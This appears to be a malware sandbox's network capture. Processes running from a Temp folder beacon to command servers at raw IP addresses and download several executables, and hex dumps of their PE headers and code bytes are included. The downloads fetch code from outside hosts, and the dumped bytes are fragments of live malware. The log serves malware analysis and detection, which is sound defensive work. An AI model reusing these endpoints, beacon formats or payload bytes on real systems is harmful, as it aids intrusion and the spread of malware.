2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKECFIIEHCFHIECAFBAK--
Sep 27, 2024 04:21:34.435580969 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49723	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:13.777290106 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Sep 27, 2024 04:21:14.490046978 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49724	176.113.115.95	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:14.087455988 CEST	58	OUT	GET /thebig/stories.exe HTTP/1.1 Host: 176.113.115.95
Sep 27, 2024 04:21:14.987613916 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Fri, 27 Sep 2024 02:21:14 GMT Content-Type: application/octet-stream Content-Length: 3247089 Connection: keep-alive X-Powered-By: PHP/7.4.33 Content-Description: File Transfer Content-Disposition: attachment; filename=stories.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@P,CODE0 `DATAP@BSS.idataP@.tls.rdata@P.reloc@P.rsrc,,@P@
Sep 27, 2024 04:21:14.987627029 CEST	1236	IN	Data Raw: 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @Pstring<@m@)@(@(@)@$)@Free0
Sep 27, 2024 04:21:14.987782001 CEST	1236	IN	Data Raw: 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 3c c4 40 00 e8 6c fe ff ff 84 c0 75 13 68 00 80 Data Ascii: [SVW}sjh Vj;t#<@luhjP3_^[SVWUCjh hU;usjh VU;t#<@uhjPb3]_^[SVWUL$$D$
Sep 27, 2024 04:21:14.987795115 CEST	672	IN	Data Raw: b8 4c c4 40 00 e8 95 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 ce 19 40 00 64 ff 32 64 89 22 68 1c c4 40 00 e8 39 f9 ff ff 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 2e f9 ff ff b8 3c c4 40 00 e8 8c f9 ff ff b8 4c c4 Data Ascii: L@3_^[U3Uh@d2d"h@9=2@th@.<@L@x@xhjt@=t@t/t@3L@=u\@@h@@3ZYYdh@=2@th@)@]US=@3Uh@
Sep 27, 2024 04:21:14.987807035 CEST	1236	IN	Data Raw: 10 83 c0 04 e8 ca ff ff ff c3 83 fa 04 7c 0a 8b ca 81 c9 02 00 00 80 89 08 03 c2 83 20 fe c3 53 56 8b d0 83 ea 04 8b 12 8b ca 81 e1 02 00 00 80 81 f9 02 00 00 80 74 0a c7 05 18 c4 40 00 04 00 00 00 8b da 81 e3 fc ff ff 7f 2b c3 8b c8 33 11 f7 c2 Data Ascii: \| SVt@+3t@t r+;pt@^[@SVW3t%uhF#_^[SVWUkC7++
Sep 27, 2024 04:21:14.987818956 CEST	1236	IN	Data Raw: ff 89 7c 86 f4 eb 26 8b f3 85 f6 79 03 83 c6 03 c1 fe 02 8b 3d 74 c4 40 00 89 44 b7 f4 8b 32 89 75 f8 8b 75 f8 89 46 04 8b 75 f8 89 30 8b c1 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 fc c3 40 00 83 eb 04 01 1d 00 c4 40 00 e8 8e 0e 00 00 e9 Data Ascii: \|&y=t@D2uuFu0RE@@;l@J)l@=l@}l@3l@p@p@E@@92E3ZYYdhO!@=2@th@5E_^[YY]@UQSVW3
Sep 27, 2024 04:21:14.987832069 CEST	1236	IN	Data Raw: ff 74 12 8b c8 8b d7 8b c3 e8 2d 01 00 00 8b c3 e8 fe fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 89 25 40 00 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 fb ec ff ff c3 e9 75 08 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8b c0 85 c0 74 0a ff 15 04 Data Ascii: t-}3ZYYdh%@=2@th@uE_^[Y]t@tjt@uRt2tP@Yt.@utP@Yt@@tZH=&@y"
Sep 27, 2024 04:21:14.987844944 CEST	1236	IN	Data Raw: 18 8a 1a eb eb b5 00 8a 5c 0e 06 32 1c 0a 80 e3 df 75 ee 49 75 f1 8b 46 02 5f 5e 5b c3 8b c0 53 56 57 89 cf 31 db 31 c9 8b 70 dc 85 f6 74 13 66 8b 0e 83 c6 02 3b 56 02 74 13 66 8b 1e 01 de 49 75 f3 8b 40 ec 85 c0 75 df 88 07 eb 0a 83 c6 06 31 c9 Data Ascii: \2uIuF_^[SVW11ptf;VtfIu@u1A_^[SVW11Pptf>N8ttOu@uZN\2uIuZ_^[RQSP1L$diA*@Ad[YZD$,@&R=
Sep 27, 2024 04:21:14.987948895 CEST	896	IN	Data Raw: 83 60 04 fd 81 38 ce fa ed 0e 74 0d 8b 42 08 e8 1f fa ff ff e8 02 fc ff ff 31 c0 83 c4 14 64 8b 10 59 8b 12 89 11 5d 5f 5e 5b b8 01 00 00 00 c3 8d 40 00 e8 2b 02 00 00 8b 90 00 00 00 00 8b 0a 89 88 00 00 00 00 8b 42 08 e8 e5 f9 ff ff 5a 8b 64 24 Data Ascii: `8tB1dY]_^[@+BZd$,1YdX]{1L$D$d$@UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&
Sep 27, 2024 04:21:14.987962961 CEST	1236	IN	Data Raw: 10 00 c3 31 c0 c3 90 53 56 57 89 c3 89 d6 89 cf 89 f8 e8 cc ff ff ff 89 f9 89 c7 85 f6 74 09 89 c2 89 f0 e8 eb f3 ff ff 89 d8 e8 f8 fe ff ff 89 3b 5f 5e 5b c3 8b c0 52 89 e2 b9 01 00 00 00 e8 c3 ff ff ff 5a c3 90 31 c9 8a 0a 42 e8 b6 ff ff ff c3 Data Ascii: 1SVWt;_^[RZ1B1t!R:t:Jt:Jt:JtBBBZ)@t@t?SVWyV9tNT_^[ta;t\;tPQZXSV
Sep 27, 2024 04:21:14.993784904 CEST	837	IN	Data Raw: 10 e9 c9 ee ff ff c3 31 d2 66 8b 10 f7 c2 00 40 00 00 75 1a 83 fa 08 72 15 81 fa 00 01 00 00 75 13 66 c7 00 00 00 83 c0 08 e9 25 fa ff ff 66 c7 00 00 00 c3 50 e8 b5 da ff ff c3 39 d0 74 6c 66 83 38 08 72 1b 50 52 66 81 38 00 01 74 08 50 e8 9b da Data Ascii: 1f@uruf%fP9tlf8rPRf8tPZXf:sJHJHf:uRtJA~JfPfRPTT@USVWf;u;fEWjhVEP"tE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49725	185.215.113.117	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:14.544011116 CEST	58	OUT	GET /inc/needmoney.exe HTTP/1.1 Host: 185.215.113.117
Sep 27, 2024 04:21:15.269310951 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:15 GMT Content-Type: application/octet-stream Content-Length: 4278784 Last-Modified: Thu, 12 Sep 2024 13:56:06 GMT Connection: keep-alive ETag: "66e2f2f6-414a00" Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*8L@A@x" 7`@PCODE `DATA -.@BSS.idatax"$@.tls@.rdataP@P.reloc@`@P.rsrc7 7@PAJA@P
Sep 27, 2024 04:21:15.269341946 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word@Cardinal@Int64
Sep 27, 2024 04:21:15.269356012 CEST	1236	IN	Data Raw: 50 08 8b 56 04 89 50 0c 8b 13 89 10 89 58 04 89 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 e8 05 49 00 89 10 a3 e8 05 49 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 06 8b Data Ascii: PVPXB^[PQIISVWUQ$]$PV;SS;uCCFF;CuCF;uVu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u)
Sep 27, 2024 04:21:15.269457102 CEST	1236	IN	Data Raw: 83 7c 24 0c 00 75 b1 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 25 fd ff ff 8b 04 24 33 d2 89 10 e9 90 00 00 00 8d 4c 24 04 8b d7 8b c6 e8 94 fc ff ff 83 7c 24 04 00 74 34 8d 4c 24 0c 8d 54 24 04 8b c5 e8 16 fb ff ff 83 7c 24 0c 00 0f 85 66 ff ff ff Data Ascii: \|$uL$T$D$%$3L$\|$t4L$T$\|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$
Sep 27, 2024 04:21:15.269468069 CEST	1236	IN	Data Raw: 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb 11 8d 4c 24 01 8b d7 83 ea 04 8d 46 04 e8 b2 fb ff ff 8b 6c 24 01 85 ed 74 34 8b d5 2b d6 8b c6 e8 63 fe ff ff 8b c5 03 44 24 05 8b 53 Data Ascii: ++}L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$IDu$I\[:CZ,<\|uI
Sep 27, 2024 04:21:15.269479990 CEST	1236	IN	Data Raw: 05 49 00 e8 fd f0 ff ff c3 e9 ef 16 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b d8 33 c0 a3 c8 05 49 00 80 3d c4 05 49 00 00 75 1f e8 66 f7 ff ff 84 c0 75 16 c7 05 c8 05 49 00 08 00 00 00 c7 45 fc 08 00 00 00 e9 61 Data Ascii: IE_^[YY]@UQSVW3I=IufuIEa3Uh$@d1d!=MIthIuII%)ItEP\|tI+;PtIT
Sep 27, 2024 04:21:15.269490957 CEST	776	IN	Data Raw: e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c d0 48 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 43 3b 00 00 83 b8 00 00 00 00 00 74 0f e8 35 3b 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 23 3b 00 00 83 b8 00 00 00 00 00 74 0f e8 15 3b 00 00 8b 80 Data Ascii: tP<HYt@C;t5;@3#;t;@3SV;t:^:3F3^[@HqSV=ItIu:w3HH3^[$
Sep 27, 2024 04:21:15.269507885 CEST	1236	IN	Data Raw: d7 f3 a4 5f 5e c3 88 c8 2a 0f 76 f7 88 ca eb e8 c3 33 c9 8a 0a 41 92 e8 65 fe ff ff c3 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 4b fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 Data Ascii: _^*v3AeS:vB@K[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6
Sep 27, 2024 04:21:15.269551039 CEST	1236	IN	Data Raw: 8f a1 5f 40 df 4e 67 04 cd c9 f2 c9 62 40 96 22 81 45 40 7c 6f fc 65 40 9e b5 70 2b a8 ad c5 9d 69 40 d5 a6 cf ff 49 1f 78 c2 d3 40 a3 14 9b c5 16 ab b3 ef 3d 41 e0 8c e9 80 c9 47 ba 93 a8 41 aa 17 e6 7f 2b a1 16 b6 12 42 6b 55 27 39 8d f7 70 e0 Data Ascii: _@Ngb@"E@\|oe@p+i@Ix@=AGA+BkU'9p\|B0<RB~QC/j\&Cv)/&D'DDYdEJzEb>9FFuuvHM9;5S]=];Z T7aZ%]g']
Sep 27, 2024 04:21:15.269562006 CEST	1236	IN	Data Raw: ff ff 59 58 74 02 ff e6 59 e9 63 f5 ff ff c3 8b c0 eb 02 8b 00 39 d0 74 08 8b 40 dc 85 c0 75 f3 c3 b0 01 c3 90 83 c0 c4 8b 00 c3 8b c0 b8 ff ff 00 80 c3 8b c0 c3 8d 40 00 c3 8d 40 00 c3 8d 40 00 56 66 8b 32 66 09 f6 74 17 66 81 fe 00 c0 73 10 50 Data Ascii: YXtYc9t@u@@@Vf2ftfsPpXt^^aSVW11ptf>N8tfOu@u\12uIuF_^[SVW11ptf;VtfIu@u1A
Sep 27, 2024 04:21:15.274327993 CEST	1236	IN	Data Raw: 8b 44 24 14 8b 48 0c eb 27 80 3d 2c d0 48 00 01 76 1e 80 3d 28 d0 48 00 00 77 15 50 8d 44 24 08 52 51 50 e8 31 d9 ff ff 83 f8 00 59 5a 58 74 6d 31 db 64 8b 1b 53 50 52 51 8b 54 24 28 83 48 04 02 56 6a 00 50 68 c0 39 40 00 52 ff 15 18 00 49 00 5b Data Ascii: D$H'=,Hv=(HwPD$RQP1YZXtm1dSPRQT$(HVjPh9@RI[\|$()oG9@D$c#Z)AD$T$@tJBD:@SVWUj]_^[uZTUWVSPR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49726	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:18.382704020 CEST	183	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 30 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000065001&unit=246122658369
Sep 27, 2024 04:21:19.108994007 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49727	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:19.259577990 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:19.961982012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:20.068553925 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:20.299313068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49728	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:20.150887966 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Sep 27, 2024 04:21:20.850487947 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 27, 2024 04:21:20.892436981 CEST	53	OUT	GET /inc/penis.exe HTTP/1.1 Host: 185.215.113.16
Sep 27, 2024 04:21:21.116508007 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:21 GMT Content-Type: application/octet-stream Content-Length: 419328 Last-Modified: Thu, 26 Sep 2024 16:40:28 GMT Connection: keep-alive ETag: "66f58e7c-66600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b d9 e1 fd 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 4a 06 00 00 1a 00 00 00 00 00 00 ae 68 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 68 06 00 4b 00 00 00 00 80 06 00 f4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0Jh @ @`hK H.textH J `.rsrcL@@.relocd@BhH[.((0s~%:&~&s%(+o8[o%F~2(%G~2(%H~2(%e~2(~3(o8(ss~}~s(o}{I~2(o9I~2(8C~2(o:{~4(8{~5(
Sep 27, 2024 04:21:21.116534948 CEST	224	IN	Data Raw: 08 00 11 08 28 19 00 00 0a 16 fe 01 13 0a 11 0a 39 d1 03 00 00 00 11 08 16 6f 1a 00 00 0a 13 0c 12 0c 28 1b 00 00 0a 6f 1c 00 00 0a 11 08 16 17 6f 1d 00 00 0a 28 1e 00 00 0a 13 08 11 06 7b 02 00 00 04 7e 36 03 00 04 28 cf 05 00 06 13 0b 11 0b 28 Data Ascii: (9o(oo({~6((9ssss ~%:&~'s!%(+s ~%:&~(s!%(
Sep 27, 2024 04:21:21.116545916 CEST	1236	IN	Data Raw: 00 00 2b 13 0f 11 06 fe 06 1d 00 00 06 73 20 00 00 0a 7e 08 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 29 00 00 06 73 21 00 00 0a 25 80 08 00 00 04 28 02 00 00 2b 13 10 11 07 11 08 7e 37 03 00 04 28 d3 05 00 06 00 11 07 11 0b 7e 38 03 00 Data Ascii: +s ~%:&~)s!%(+~7(~8(s"~%:&~*s#%(+~9(~:(s$~%:&~+s%%(+~;(
Sep 27, 2024 04:21:21.116558075 CEST	1236	IN	Data Raw: 28 13 06 00 06 7e 48 03 00 04 28 17 06 00 06 00 00 dd 09 00 00 00 13 09 00 00 dd 00 00 00 00 dd c3 00 00 00 00 11 07 11 07 7e 49 03 00 04 28 1b 06 00 06 28 36 00 00 0a 3a 11 00 00 00 11 07 7e 49 03 00 04 28 1b 06 00 06 38 0c 00 00 00 1f 3b 7e 32 Data Ascii: (~H(~I((6:~I(8;~2(~E(~J((6:~J(8;~2(~F(~K(#(6:~K(#8;~2(~H(~K(#
Sep 27, 2024 04:21:21.116569042 CEST	1236	IN	Data Raw: 0a 28 3e 00 00 0a 20 40 42 0f 00 6a 5b 21 00 91 10 b6 02 00 00 00 59 7e 52 03 00 04 28 3f 06 00 06 00 25 11 05 11 06 19 7e 44 03 00 04 28 07 06 00 06 6f 35 00 00 0a 7e 53 03 00 04 28 43 06 00 06 00 25 11 05 11 06 20 9a 00 00 00 7e 32 03 00 04 28 Data Ascii: (> @Bj[!Y~R(?%~D(o5~S(C% ~2(~T(G~G(~U(K~V(Oj92(?(@(A!Y~R(?:8~W(S(6
Sep 27, 2024 04:21:21.116580009 CEST	1236	IN	Data Raw: 23 ff ff ff 26 20 00 00 00 00 38 18 ff ff ff 11 12 3a 4f ff ff ff 38 ae 01 00 00 00 00 11 0f 11 06 16 7e 44 03 00 04 28 07 06 00 06 28 13 00 00 06 13 07 20 00 00 00 00 7e 2e 03 00 04 7b 23 03 00 04 39 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 Data Ascii: #& 8:O8~D(( ~.{#9& 8ED8: 8~[(c ~.{:& 8~D(( 8o%-(
Sep 27, 2024 04:21:21.116591930 CEST	1236	IN	Data Raw: 01 00 00 6f 01 00 00 09 00 00 00 16 00 00 01 1b 30 05 00 bc 01 00 00 08 00 00 11 38 16 00 00 00 fe 0c 00 00 45 02 00 00 00 7f 01 00 00 12 00 00 00 38 7a 01 00 00 00 7e 14 00 00 0a 13 07 38 09 00 00 00 11 07 13 05 38 67 01 00 00 00 00 02 16 28 15 Data Ascii: o08E8z~88g(v@ ~.{:& 8Ep[8k=~2((I8b8 8~`(w ~.{:& 8
Sep 27, 2024 04:21:21.116638899 CEST	1236	IN	Data Raw: 02 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 06 00 45 02 00 00 00 05 00 00 00 a1 01 00 00 38 00 00 00 00 38 2e 00 00 00 38 00 00 00 00 16 d0 0b 00 00 01 28 4c 00 00 0a d0 02 00 00 02 28 17 00 00 06 28 18 00 00 06 28 4d 00 00 0a Data Ascii: :& 8E88.8(L(((M8~{N~~:880rp(L8%((O(P~{Q~~:884(8%(%(R
